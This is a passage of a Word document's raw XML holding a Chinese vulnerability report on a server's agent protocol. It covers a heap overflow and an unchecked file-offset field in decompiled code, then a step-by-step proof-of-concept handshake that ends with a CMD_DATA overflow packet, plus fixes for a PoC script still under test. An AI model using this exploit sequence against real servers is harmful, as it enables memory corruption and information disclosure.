      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆分配32字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CC188D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>v80 = buf + (v116+13)*2 = buf+28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（在32字节内，安全）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39930DD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>溢出大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中宽字符串长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 4 WCHARs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE44D4">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i105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0"/>
    <w:p w14:paraId="5B758258">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VULN-0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任意文件偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A13EA">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>处理函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>sub_14008A040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（AgentDisposal.cpp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~L12049）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C81049">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_14008A040(conn, header*, payload*)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 从 header 读取 Offset 字段（bytes 24-27），直接传递给升级工作队列</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 无范围检查 → 可请求服务端读取文件任意偏移处的数据</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade_offset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72"/>
        </w:rPr>
        <w:t>*(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 未经验证！</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>enqueue_upgrade_work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> upgrade_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C88F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：信息泄露（读取任意文件偏移）；与其他漏洞组合可造成逻辑破坏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D20417">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>利用条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：已完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DataTransfer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手（CMD_WANT_TALK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已发送）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="21"/>
    <w:p w14:paraId="580938B8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="仿宋"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="X5b38575136753b8990dffd8eb641e65ca18eace"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三、测试脚本验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2F86B">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="X9b0db6209e8a3da32eaac61e182dba17210f36c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手序列（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正在测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30477C">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第一步：连接</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
        </w:rPr>
        <w:t>"192.168.2.130"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>8237</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第二步：接收服务端初始问候（CMD_HELLO 0x3039）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">hdr, _ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> recv_ocp_packet(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4F1D7">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># server → CMD_HELLO(0x3039, AgentID=X)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A61E3D">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">hello_agent_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> hdr.AgentID</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第三步：AgentCheck 阶段 - 发送 CMD_VERSION(0x6010)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># flags=0x0001(bit0=1), version=1, AgentID=X（使用 HELLO 的 AgentID）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_VERSION, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>hello_agent_id)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">hdr, _ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> recv_ocp_packet(s)         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># server → CMD_WAIT(0x6009, AgentID=Y)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># [AgentCheck 工作线程触发 sub_1402D7940，注册 DataTransfer 分发]</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第四步：接收 CMD_READY(0x6000)（阶段切换信号）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">hdr, _ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> recv_ocp_packet(s)         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># server → CMD_READY(0x6000, AgentID=Z)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">ready_agent_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> hdr.AgentID        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># conn+392[Z] = 0（已存入）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第五步：DataTransfer 阶段 - 发送 CMD_WANT_TALK(0x6001)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># ★★★ flags=0x0000（bit0=0）★★★  不是 0x0001！</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_WANT_TALK, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># bit0=0 → n4=0 → sub_1402D3DB0 路由到 sub_1402D1580 → 代理注册</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># 第六步：发送漏洞利用包</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># CMD_DATA(0x6700, bit0=1, AgentID=Z)：使用 CMD_READY 的 AgentID</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># conn+392[Z] 命中（value=0）→ n4=0 → DataTransfer 路由 → sub_14015B810</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># sub_140158830 查代理表（由 WANT_TALK 注册）→ 找到 → 入队 → VULN-02</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_DATA, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ready_agent_id, payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>overflow_payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1469C899">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i104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2"/>
    <w:bookmarkEnd w:id="23"/>
    <w:p w14:paraId="3DA36ACF">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="X370e684308c35c0d58fb345421aa0a2616fbd86"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC（oserver3_poc.py）存在的问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026798C4">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="问题1握手阶段发错命令agentcheck-阶段"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题1：握手阶段发错命令（AgentCheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E303AEB">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AgentCheck </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_WANT_TALK(0x6001) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来响应服务端问候。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B3C64">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：CMD_WANT_TALK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AgentCheck CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表中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然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确响应应为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>CMD_VERSION(0x6010)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4275DF">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># 当前：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_WANT_TALK, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>server_hello_agent_id)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正在解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_VERSION, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
